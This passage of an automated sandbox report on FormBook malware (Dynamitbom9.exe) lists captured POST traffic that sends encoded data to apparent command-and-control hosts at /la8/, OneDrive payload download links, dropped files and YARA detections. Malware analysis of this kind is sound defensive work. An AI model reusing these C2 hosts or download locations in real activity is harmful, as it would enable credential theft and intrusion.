50 79 68 69 47 47 42 46 34 69 75 4a 68 4b 79 63 77 43 38 34 5f 36 66 48 4a 7e 67 7e 53 4c 34 35 56 46 39 50 47 62 45 78 63 32 6f 6e 77 59 53 79 64 6c 38 4c 64 4f 35 71 38 4a 77 46 73 76 65 31 58 49 7a 70 75 45 6c 5a 44 46 53 6f 33 4d 30 66 4b 43 31 42 62 32 4b 35 4e 63 64 63 57 39 69 37 58 51 5f 4f 65 4a 56 4e 49 47 30 37 65 70 54 33 35 36 58 63 58 34 4a 5a 5f 4f 49 67 43 62 4c 52 59 4e 30 4f 59 36 37 56 5a 45 54 67 77 4c 61 71 35 6c 47 6a 6b 36 41 46 53 41 6e 52 38 37 5f 34 6d 32 64 61 52 54 67 63 36 77 5a 39 75 57 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: 
8po=dH8gPrEF6Cm63GGldfSFXHhWV40FbDo6nkestQP3U0603EvCk4l86KREyy11JyFahkRFJqWK~yoAj-VGNqePzElh8AIqa9xRB_XVAInq98SQEvGnFh(m44UbNRdYqqHiyNvdAXXRwt9hG7IwfMDs~nhxfZpm~nsnCF2jSTelJiv9yvtSIiwKXVwsNJGJ29oQCZcCcC(7SN6wMkcJt3dhV1WD~XdOwTbA1BaPyhiGGBF4iuJhKycwC84_6fHJ~g~SL45VF9PGbExc2onwYSydl8LdO5q8JwFsve1XIzpuElZDFSo3M0fKC1Bb2K5NcdcW9i7XQ_OeJVNIG07epT356XcX4JZ_OIgCbLRYN0OY67VZETgwLaq5lGjk6AFSAnR87_4m2daRTgc6wZ9uWQ).
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.pappinlawoffice.comConnection: closeContent-Length: 138317Cache-Control: no-cacheOrigin: http://www.pappinlawoffice.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.pappinlawoffice.com/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 64 48 38 67 50 71 38 37 71 69 69 76 6d 41 36 55 66 4e 65 6f 5a 48 31 55 44 66 6b 57 44 67 55 41 35 44 58 33 74 51 28 7a 4e 6c 71 6d 7a 6b 66 43 31 71 39 5f 32 4b 52 48 36 53 31 32 4e 79 5a 69 6a 7a 6c 33 4a 75 4f 77 7e 79 67 44 31 49 52 65 4e 36 66 50 79 6b 6f 53 36 42 74 34 61 34 78 4f 42 61 47 54 4c 59 62 71 67 63 36 53 61 36 69 73 43 69 72 69 6d 59 59 53 50 55 5a 4e 72 59 54 61 7a 6f 4f 34 51 46 7a 54 31 62 39 63 59 4c 34 55 4f 72 28 6e 67 6e 31 32 54 36 56 50 77 6d 67 37 46 48 50 63 63 79 65 71 58 43 6e 30 35 4d 5a 6b 59 6d 42 32 57 47 35 64 4e 4b 32 5a 6f 76 39 55 4a 34 41 61 50 44 79 57 64 5a 43 79 43 7a 6f 52 70 30 6c 63 47 6b 6d 73 79 32 74 4a 31 48 6a 77 30 48 65 66 32 41 71 39 41 6c 56 6b 36 72 31 33 4a 6c 45 6f 50 63 49 51 67 4f 66 67 70 42 65 61 62 72 55 2d 4b 39 4f 61 5a 45 78 51 7e 4d 4c 49 63 6b 7e 6f 31 66 69 36 4f 34 7a 71 42 42 5a 70 73 63 78 44 56 6d 46 56 47 56 78 66 4f 42 51 6c 65 58 7a 33 58 33 64 72 35 71 35 57 53 5f 6b 64 39 69 37 54 51 39 32 30 47 41 35 49 63 42 75 41 76 78 66 31 38 58 63 4b 72 70 4a 78 48 62 46 4a 62 4c 70 59 4d 46 7e 2d 72 61 4e 5a 42 41 34 7a 4d 37 71 35 31 47 6a 6b 33 67 45 6c 4b 48 51 67 34 63 73 58 31 34 61 33 4f 30 4e 2d 38 71 41 64 4e 55 30 69 66 51 4a 5a 62 43 58 47 43 6b 56 6a 6b 61 4e 67 75 79 51 6b 4a 74 41 54 6f 79 64 48 66 6e 59 79 63 4c 30 38 73 52 36 6f 74 57 39 6e 45 31 53 4a 45 38 31 4a 69 31 68 64 71 4a 64 50 6f 71 6c 5a 28 79 54 65 41 78 68 53 61 6b 74 53 33 62 45 4b 46 41 41 46 33 45 4c 41 58 4b 36 5f 42 74 63 4d 6e 68 4d 45 4f 39 4e 74 54 5a 41 32 6f 
30 4c 72 56 72 38 44 4f 51 48 5a 37 64 48 42 28 38 6b 6e 70 70 62 31 45 35 74 35 43 54 79 46 41 71 50 63 72 69 46 66 30 5f 34 49 68 64 32 67 43 51 5a 63 4b 36 32 64 39 46 39 47 66 39 62 30 67 4d 59 6a 75 66 6c 35 41 76 36 6b 4f 34 56 4c 31 48 43 70 32 39 4a 48 57 55 4d 69 6e 42 56 36 35 37 6e 32 65 62 78 4a 47 38 46 71 7a 4a 30 37 67 59 7a 2d 63 47 33 41 72 73 51 37 76 73 34 7a 6e 30 4e 38 56 64 62 42 78 78 49 4c 46 4f 67 48 4a 70 7a 44 73 53 4d 50 7e 75 37 33 55 51 51 72 45 4d 56 68 44 37 48 66 4b 36 46 58 76 43 34 64 4f 56 66 52 34 74 59 6a 7a 59 69 78 49 51 7a 34 6b 57 63 6a 59 36 71 31 52 57 4d 49 45 38 6d 4d 6c 33 4e 4e 73 65 70 32 53 50 59 55 42 50 32 5f 58 73 50 30 33 74 34 70 43 35 51 59 65 50 76 6b 31 59 55 71 36 51 57 73 37 4d 77 7a 6b 56 5a 6d 32 61 41 4d 38 75 4c 6e 76 36 4d 6e 5a 59 41 39 37 5f 6b 2d 4f 48 30 44 74 30 7a 47 66 57 35 78 68 32 48 64 7a 4e 4a 51 49 42 41 50 74 53 69 44 6c 69 6f 73 53 63 4b 6c 42 6e 33 4a 57 33 6b 4f 37 65 64 53 4a 53 4f 68 32 4c 4e 61 6b 69 76 5f 7a 53 4a 59 51 67 4a 6
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.energyccm.comConnection: closeContent-Length: 409Cache-Control: no-cacheOrigin: http://www.energyccm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyccm.com/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 32 41 4e 59 49 45 4a 5f 37 72 45 36 38 56 67 54 68 34 4d 42 39 36 61 53 6c 67 77 6b 61 4d 6e 62 52 72 69 50 35 63 4d 6a 30 62 6f 4e 38 64 58 41 72 6a 34 4d 70 6a 53 68 6a 33 33 47 38 77 42 2d 35 77 75 4c 4a 75 30 48 61 75 55 36 53 30 6d 77 43 4f 7a 6c 62 62 4f 50 59 4c 53 45 56 77 32 67 48 45 46 75 45 50 53 55 41 69 41 43 47 44 47 75 69 6e 66 6b 4e 34 57 72 42 2d 4f 6e 46 52 58 70 4a 58 56 61 79 42 78 78 64 57 4c 4e 6d 5a 6c 47 46 36 4e 51 79 75 49 6a 69 72 4e 64 4f 75 74 4e 53 6f 52 2d 31 34 54 50 36 56 42 6e 51 59 37 62 42 71 68 4c 47 68 33 4c 61 67 30 4b 49 7a 4b 48 55 6c 4b 75 44 75 78 6d 4f 62 37 6a 56 4d 53 55 46 44 57 30 6f 6c 4a 56 4c 35 56 4c 55 50 78 58 7a 72 4e 71 28 75 6e 30 6b 62 76 41 64 6c 49 61 72 42 4f 49 28 63 66 49 67 68 76 73 59 75 6b 77 62 4e 64 71 4d 73 71 72 30 2d 6c 75 51 6b 6f 55 52 53 6b 78 52 34 49 32 79 6d 70 4a 76 44 78 75 6a 4e 53 34 6c 65 56 72 63 63 59 4e 59 74 46 49 62 5a 43 69 73 4b 39 76 4c 34 41 68 6b 5a 65 43 69 37 49 47 52 5f 31 63 68 56 33 50 6e 32 34 43 56 67 4a 42 56 56 32 31 42 65 72 4f 6a 6a 68 55 44 34 72 67 67 77 70 34 7a 50 78 75 47 33 41 74 56 47 63 38 63 7a 6f 72 68 53 63 50 6b 79 77 4c 6b 77 4f 57 7a 37 6d 59 7a 54 4f 4c 6f 37 59 74 71 67 29 2e 00 6d 32 64 61 52 54 67 Data Ascii: 
8po=2ANYIEJ_7rE68VgTh4MB96aSlgwkaMnbRriP5cMj0boN8dXArj4MpjShj33G8wB-5wuLJu0HauU6S0mwCOzlbbOPYLSEVw2gHEFuEPSUAiACGDGuinfkN4WrB-OnFRXpJXVayBxxdWLNmZlGF6NQyuIjirNdOutNSoR-14TP6VBnQY7bBqhLGh3Lag0KIzKHUlKuDuxmOb7jVMSUFDW0olJVL5VLUPxXzrNq(un0kbvAdlIarBOI(cfIghvsYukwbNdqMsqr0-luQkoURSkxR4I2ympJvDxujNS4leVrccYNYtFIbZCisK9vL4AhkZeCi7IGR_1chV3Pn24CVgJBVV21BerOjjhUD4rggwp4zPxuG3AtVGc8czorhScPkywLkwOWz7mYzTOLo7Ytqg).m2daRTg
    Source: global trafficHTTP traffic detected: POST /la8/ HTTP/1.1Host: www.energyccm.comConnection: closeContent-Length: 138317Cache-Control: no-cacheOrigin: http://www.energyccm.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.energyccm.com/la8/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 38 70 6f 3d 32 41 4e 59 49 45 39 42 35 62 41 6e 37 6a 55 59 7a 4c 67 6b 33 37 32 63 7a 33 6f 33 54 37 4c 50 63 59 6d 68 35 64 39 71 74 4a 41 6c 35 39 4c 41 74 67 63 50 6c 6a 53 69 79 6e 33 48 32 51 63 48 77 48 71 31 4a 71 4d 74 61 75 4d 37 62 58 4f 70 43 65 7a 4d 59 37 53 5f 61 4b 32 55 56 7a 44 77 45 6e 6f 37 42 50 65 55 64 69 59 41 49 47 75 50 6f 44 4f 31 48 6f 4b 71 44 37 36 36 5a 7a 54 52 4a 78 64 6f 31 44 56 5f 4d 51 44 38 6a 5a 30 76 42 74 52 68 34 65 4e 72 6e 71 59 5a 54 5a 39 42 65 4e 78 32 37 61 37 4f 35 6d 78 70 58 61 6a 4d 46 62 6c 2d 45 51 48 31 61 6a 45 61 45 6c 79 53 44 45 57 32 45 50 73 75 57 35 4c 6c 4a 4c 4f 4d 55 57 37 4f 7a 6d 42 54 55 4d 78 4d 48 76 63 50 30 6f 35 36 69 61 72 48 6d 70 62 4d 4f 55 56 74 6d 33 75 41 39 63 76 6e 70 43 50 33 42 50 45 43 59 4c 4e 51 53 38 71 41 35 65 6c 36 45 30 35 74 56 6a 78 38 47 37 68 6e 79 68 31 65 6c 79 5a 7a 33 76 57 53 36 76 55 56 65 73 51 42 58 5f 39 77 4e 59 47 70 37 70 68 62 46 59 42 6c 67 59 79 56 69 37 4a 31 52 5f 5a 32 67 68 28 50 39 47 59 52 55 44 68 4e 41 46 33 74 4e 75 37 51 74 77 45 54 44 34 7a 67 68 46 74 43 77 65 31 75 42 68 73 75 56 6e 63 38 59 44 6f 72 74 79 64 44 6a 78 64 38 37 42 6e 65 69 72 4b 47 33 45 4f 63 73 4b 39 68 33 47 65 61 5a 62 37 37 6d 56 7e 33 36 46 5a 6c 42 43 48 71 63 36 79 59 35 59 32 51 7a 6e 6c 56 35 58 63 32 38 37 73 75 37 45 68 55 35 6b 6b 6b 74 46 61 6d 34 41 6d 53 68 51 74 2d 61 58 4a 55 37 52 7a 62 66 5a 74 76 52 6a 45 68 47 47 6f 66 78 59 67 37 75 52 77 5a 35 4a 79 76 44 68 71 61 46 7a 55 4c 75 6d 37 2d 35 51 4d 33 7e 66 4b 6f 5a 50 67 59 49 35 63 
58 75 71 63 54 76 63 71 4c 64 6a 62 79 7e 39 73 54 64 39 56 6e 5a 4a 73 43 75 59 49 53 41 45 66 4e 4d 5f 6a 52 43 73 59 50 31 55 49 36 30 67 35 57 67 43 4f 5f 55 52 73 36 58 37 4f 69 49 52 4d 4c 48 62 6d 4d 71 58 72 4d 4b 6b 63 62 79 49 6e 7a 4d 51 74 36 68 64 4c 4a 4f 59 62 4e 75 43 67 56 58 38 43 4a 7e 6b 62 32 41 79 44 38 69 69 47 37 79 59 6c 4c 79 70 28 66 71 33 62 43 35 70 30 50 77 2d 49 4d 6a 68 6d 44 64 78 64 30 28 68 5a 74 77 52 74 7a 72 51 44 63 30 5f 61 5a 75 36 67 4f 53 71 34 46 6e 6d 55 55 72 38 53 58 4b 63 30 69 7e 65 71 72 36 6e 37 59 63 6b 4e 61 35 56 77 42 28 56 37 48 6f 49 65 50 34 6d 5a 32 6c 6c 53 44 28 46 52 55 41 41 47 65 71 6e 50 76 78 5a 31 68 37 56 69 66 68 6f 4a 37 35 63 45 33 69 64 30 6d 61 46 68 71 4a 4f 76 73 31 76 53 62 56 74 66 5a 47 63 42 7a 43 4f 6c 6b 42 4e 67 2d 6e 54 75 5a 70 53 75 49 59 57 4e 6e 49 6c 50 35 75 4f 72 41 4d 6d 75 37 62 31 34 59 49 2d 58 5f 77 37 38 45 59 47 31 6e 58 72 49 66 45 36 55 4f 6c 44 64 55 71 5a 6f 2d 43 2d 7e 76 28 37 33 57 6a 6d 74 41 4d 56 6d 6b 61 6
Source: C:\Windows\explorer.exe | Code function: 9_2_05E095A2 getaddrinfo,SleepEx,setsockopt,recv,recv
Source: unknown | DNS traffic detected: queries for: onedrive.live.com
    Source: unknown | HTTP traffic detected: POST /la8/ HTTP/1.1 Host: www.mansiobok3.info Connection: close Content-Length: 409 Cache-Control: no-cache Origin: http://www.mansiobok3.info User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http://www.mansiobok3.info/la8/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Ascii:
8po=JgrUKY4a~-9AOXFlNtwAk53QgATX3LhT2un8BtUFo8CVwgZ332TglWSXodD2cn(1JZKhdo39ElIDCA8KNlQl6lZiL9vWXUEfGkhKv54KhbsRhS3QdrfEI2necwKBg8cWXASB0u1lpmammH1df8M-zb2HnLDS1rTQTl93zGkMtvPbQRvOi3Mj54wj8V6ZIjKogc6EyF1aTEVK3HMMdOWFKDjsJ1mSIiVKAZqxP-Sj2nXlDM0YhZEnUgfq8HIBlT2p~MBHpKjFCcpqOWMMlpyYaIAQSh9iqhgwYSoyggaLAv1kKsDGUlAc340qO_CEF1Hy1zm8PxlwZT8YbxYrFgrguJNsUa~BUX4uklAvD0HX4HxvkSP8muYegKqD(C(AVp7dzWpxD1ivOMlz~0I4BA).
    Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 04 Jun 2020 07:58:21 GMT Server: Apache/2.4.29 (Ubuntu) Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /la8/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://fontfabrik.com
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp | String found in binary or memory: http://microsoft.co
    Source: Dynamitbom9.exe, 0000000A.00000003.1337755727.0000000000989000.00000004.00000001.sdmp | String found in binary or memory: http://mscrl.__
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp | String found in binary or memory: http://mscrl.micr
    Source: explorer.exe, 00000009.00000000.1318100688.0000000003230000.00000004.00000001.sdmp | String found in binary or memory: http://ns.microsoftom/photo/1.2/tD
    Source: Dynamitbom9.exe, 0000000A.00000003.1337755727.0000000000989000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digiI
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
    Source: explorer.exe, 00000009.00000002.2787480435.00000000030D0000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.carterandcone.coml
    Source: explorer.exe, 00000009.00000002.2806342066.0000000005E26000.00000040.00000001.sdmp | String found in binary or memory: http://www.energyccm.com
    Source: explorer.exe, 00000009.00000002.2806342066.0000000005E26000.00000040.00000001.sdmp | String found in binary or memory: http://www.energyccm.com/la8/
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.fonts.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/bThe
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.founder.com.cn/cn/cThe
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.goodfont.co.kr
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.jiyu-kobo.co.jp/
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sajatypeworks.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sakkal.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.sandoll.co.kr
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.tiro.com
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.typography.netD
    Source: explorer.exe, 00000009.00000000.1379152249.000000000B2B6000.00000002.00000001.sdmp | String found in binary or memory: http://www.zhongyicts.com.cn
    Source: Dynamitbom9.exe, 00000006.00000002.1401017473.00000000009B0000.00000004.00000020.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374660286.00000000009E9000.00000004.00000001.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/
    Source: Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/_
    Source: Dynamitbom9.exe, 0000000C.00000003.1374660286.00000000009E9000.00000004.00000001.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/mQ
    Source: Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/y4mAtfAsq6lZLeKEIYGIGzyPviD7kCpXiU0DzP50t27JsPKq3EruwZK0DlryXqDUdOM
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/y4mFE21wcHHQ4vRoVluodpr9FOLpOrbqvsq79ovU48nYkt3-9gzsfp-9fCG3Db2uWAL
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/y4mgfnu1PJWJr064ZL9YlIV3jl40tm0q28BBvNE2xZCPCi78baeQwIGk3HYt-PyWvAL
    Source: Dynamitbom9.exe, 0000000C.00000003.1374660286.00000000009E9000.00000004.00000001.sdmp | String found in binary or memory: https://6pjara.am.files.1drv.com/y4mzBYd9A3cfPXwSM0EhsP0kiqWd7NUCtcZWlW0_nUmR7Hn0ep5nddt_IgA5LG9KJU-
    Source: Dynamitbom9.exe, 00000006.00000002.1401017473.00000000009B0000.00000004.00000020.sdmp, Dynamitbom9.exe, 0000000A.00000002.1356109432.0000000000920000.00000004.00000020.sdmp, Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/
    Source: Dynamitbom9.exe, 0000000A.00000002.1356109432.0000000000920000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/(
    Source: Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/H
    Source: Dynamitbom9.exe, 00000006.00000002.1401017473.00000000009B0000.00000004.00000020.sdmp | String found in binary or memory: https://onedrive.live.com/X:o
    Source: Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000002.1390315977.0000000000980000.00000004.00000020.sdmp, Dynamitbom9.exe, 00000022.00000002.2646148315.0000000000560000.00000040.00000001.sdmp | String found in binary or memory: https://onedrive.live.com/download?cid=B3B98222C3EF96E0&resid=B3B98222C3EF96E0%21184&authkey=AHHJ6Y6
    Source: Dynamitbom9.exe, 00000006.00000002.1401449228.0000000000A13000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000A.00000003.1336590571.000000000095A000.00000004.00000001.sdmp, Dynamitbom9.exe, 0000000C.00000003.1374607701.00000000009C2000.00000004.00000001.sdmp, Dynamitbom9.exe, 00000022.00000003.2630959994.0000000000716000.00000004.00000001.sdmp | String found in binary or memory: https://www.digicert.com/CPS0

    E-Banking Fraud:

    Yara detected FormBook
    Source: Yara match | File source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 0000000A.00000002.1372935393.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000006.00000002.1400130496.0000000000060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000013.00000002.1395541115.0000000003490000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000022.00000002.2645870331.0000000000060000.00000040.00000001.sdmp, type: MEMORY
    Source: Yara match | File source: 00000022.00000002.2651453011.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY

    System Summary:

    Detected FormBook malware
    Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\LKLP56Q2\LKLlogri.ini
    Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\LKLP56Q2\LKLlogrf.ini
    Source: C:\Windows\SysWOW64\ipconfig.exe | Dropped file: C:\Users\user\AppData\Roaming\LKLP56Q2\LKLlogrv.ini
    Malicious sample detected (through community Yara rule)
    Source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000C.00000002.1389656002.0000000000060000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 0000001D.00000002.2392368169.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000000.1158141419.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000C.00000002.1393568430.000000001F1E0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000020.00000002.2488679059.000000000247D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000005.00000000.1134321280.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000023.00000002.2650110342.0000000002770000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000021.00000000.2475390831.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000003.00000000.1127847774.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000020.00000000.2399255598.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000006.00000002.1400210571.0000000000090000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 00000014.00000002.1403442644.00000000033D0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000002.00000002.1131426501.000000000243D000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001D.00000000.2296829574.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001E.00000002.2409357508.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000003.00000002.1166950255.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000008.00000000.1179724093.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000001E.00000000.2313927729.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 00000005.00000002.1236797846.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
    Source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
    Source: 0000000A.00000002.1354802590.00000000000A0000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
    Source: 00000002.00000000.1094133330.000000000040D000.00000020.00020000.sdmp, type: MEMORY | Matched rule: Auto-generated rule - file scan copy.pdf.r11 Author: Florian Roth
